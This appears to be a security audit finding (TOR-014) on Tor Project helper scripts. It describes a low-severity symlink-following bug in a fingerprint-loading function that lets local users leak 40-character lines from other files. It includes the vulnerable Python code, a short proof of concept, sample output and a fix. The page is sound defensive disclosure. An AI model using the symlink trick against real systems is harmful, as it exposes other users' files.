Skip to content

TOR-014 pen-torproject#14: helper-scripts - Limited File Read in badconf-entry due to insecure Fingerprint validation via symlinks

Due to insufficient validation of fingerprints and the following symlinks, low-privileged attackers on the same system can leak content from other files.

added ~7001 ~4424 labels

changed the description

Author Maintainer

Technical Description

The load_args_as_fp function reads a file via the open and prints each line via the print function, which has exactly 40 characters and does not start with a #. Due to the insufficient validation of the fingerprint and the following symlinks, a low-privileged attacker could potentially leak sensitive information.

helper-scripts/util.py

def load_args_as_fp(args, fps):
    # Try to load the filename as arg.
    if len(args) > 1:
        filename = args[1]
        if os.path.exists(filename):
            print("[+] Using file %s..." % (filename))
            with open(filename, "r") as fd:
                for line in fd:
                    line = line.strip()
                    # Ignore commented fingerprint
                    if line.startswith("#"):
                        continue
                    if len(line) != 40:
                        continue;
                    if line not in fps:
                        fps.append(line)
                        print("  [+] Adding %s" % (line))

Proof of Concept

1. Create leak file `echo -e "B\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nC" > leak_me`
2. Symlink file `ln -sf leak_me fps.txt`
3. Run vulnerable script `python3 badconf-entry.py fps.txt`

Output with leaked string AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

The string is leaked on stdout and within the file approved-routers.d/approved-routers.conf

[+] Tor documents loaded successfully
      - 6925 relays in consensus
      - 7188 server descriptors
      - 2204 bridge descriptors published in the last day
[+] Using file fps.txt...
  [+] Adding AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
No AuthDirReject rules to create...
Continuing with !reject rules.

Author Maintainer

Impact

Low-privileged users may be able to leak sensitive data from files depending on the configuration of the system. Since only lines of length 40 of a file are printed, being a limited attacker scenario, this vulnerability has been rated as Low.

Author Maintainer

Recommendation

Validate the fingerprint with the regular expression ^[0-9A-Fa-f]{40}$ or use stem and don't follow symlinks.

Author Maintainer

Type

CWE-61: UNIX Symbolic Link (Symlink) Following